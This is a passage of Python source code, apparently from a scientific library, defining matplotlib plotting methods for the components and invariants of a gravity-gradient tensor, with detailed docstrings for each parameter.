and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$V_{zy}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._vzy_label
return self.vzy.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot(self, projection=None, tick_interval=[90, 90],
minor_tick_interval=[30, 30], xlabel='', ylabel='',
colorbar='bottom', cmap='viridis', cmap_limits=None,
cmap_reverse=False, cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=8,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the 9 components of the tensor.
Usage
-----
x.plot([projection, tick_interval, minor_tick_interval, ticks, xlabel,
ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [90, 90]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 8
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if colorbar is not None:
if colorbar in set(['bottom', 'top']):
scale = 0.9
else:
scale = 0.45
else:
scale = 0.55
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(3, 3, figsize=figsize)
self.plot_vxx(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vxy(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vxz(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyx(projection=projection, ax=ax.flat[3],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyy(projection=projection, ax=ax.flat[4],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vyz(projection=projection, ax=ax.flat[5],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzx(projection=projection, ax=ax.flat[6],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzy(projection=projection, ax=ax.flat[7],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_vzz(projection=projection, ax=ax.flat[8],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
def plot_i0(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the first invariant I0 (the trace) of the tensor
I0 = vxx + vyy + vzz
which should be identically zero.
Usage
-----
x.plot_i0([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = 'Tr $V_{ij}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i0_label
if self.i0 is None:
self.compute_invar()
return self.i0.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_i1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the second invariant I1 of the tensor:
I1 = vxx*vyy + vyy*vzz + vxx*vzz - vxy**2 - vyz**2 - vxz**2
Usage
-----
x.plot_i1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$I_1$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i1_label
if self.i1 is None:
self.compute_invar()
return self.i1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_i2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the third invariant I2 (the determinant) of the tensor:
I2 = vxx*(vyy*vzz - vyz**2) + vxy*(vyz*vxz - vxy*vzz)
+ vxz*(vxy*vyz - vxz*vyy)
Usage
-----
x.plot_i2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = 'det $V_{ij}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i2_label
if self.i2 is None:
self.compute_invar()
return self.i2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_i(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None, fname=None):
"""
Plot the dimensionless quantity I of Pedersen and Rasmussen (1990)
I = -(I2/2)**2 / (I1/3)**3
that is bounded by 0 and 1.
Usage
-----
x.plot_i([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$-(I_2/2)^{2} / (I_1/3)^{3}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._i_label
if self.i is None:
self.compute_invar()
return self.i.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)
def plot_invar(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the three invariants of the tensor and the derived quantity I.
Usage
-----
x.plot_invar([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, axes_labelsize, tick_labelsize, ax, show,
fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
Text label for the y axis of the colorbar
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
If present, and if axes is not specified, save the image to the
specified file.
"""
if colorbar is not None:
if colorbar in set(['bottom', 'top']):
scale = 0.8
else:
scale = 0.5
else:
scale = 0.6
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(2, 2, figsize=figsize)
self.plot_i0(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
